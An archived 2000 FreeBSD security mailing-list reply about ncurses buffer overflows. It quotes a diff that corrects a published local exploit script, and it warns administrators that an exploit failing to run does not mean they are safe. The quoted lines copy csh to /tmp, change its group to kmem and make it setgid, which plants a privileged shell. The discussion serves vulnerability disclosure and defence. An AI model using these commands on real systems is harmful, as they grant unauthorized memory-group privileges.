Date: Tue, 10 Oct 2000 17:58:35 -0700 From: Steve Reid <sreid@sea-to-sky.net> To: Mike Silbersack <silby@silby.com> Cc: freebsd-security@FreeBSD.ORG Subject: Re: ncurses buffer overflows (fwd) Message-ID: <20001010175835.E9112@grok> In-Reply-To: <20001010175013.D9112@grok>; from Steve Reid on Tue, Oct 10, 2000 at 05:50:13PM -0700 References: <20001010165908.C9112@grok> <Pine.BSF.4.21.0010101908580.4266-100000@achilles.silby.com> <20001010175013.D9112@grok>
next in thread | previous in thread | raw e-mail | index | archive | help
On Tue, Oct 10, 2000 at 05:50:13PM -0700, Steve Reid wrote: > --- exploit.csh.orig Tue Oct 10 17:42:49 2000 +++ exploit.csh Tue Oct 10 17:46:53 2000 > @@ -11,7 +11,7 @@ > #!/bin/csh > > cp /bin/csh /tmp > -/usr/sbin/chown venglin.kmem /tmp/csh > +chgrp kmem /tmp/csh > chmod 2755 /tmp/csh > __EOF__ BTW, the above is relative to the exploit Przemyslaw Frasunek posted to bugtraq. The one he posted to freebsd-security, the line was: /usr/sbin/chgrp kmem /tmp/csh Which also doesn't work because chgrp is in /usr/bin, not /usr/sbin. This just goes to show, that just because an exploit script doesn't work for you, doesn't mean that you are not vulnerable. Assume the worst! To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message
Want to link to this message? Use this URL: <https://mail-archive.FreeBSD.org/cgi/mid.cgi?20001010175835.E9112>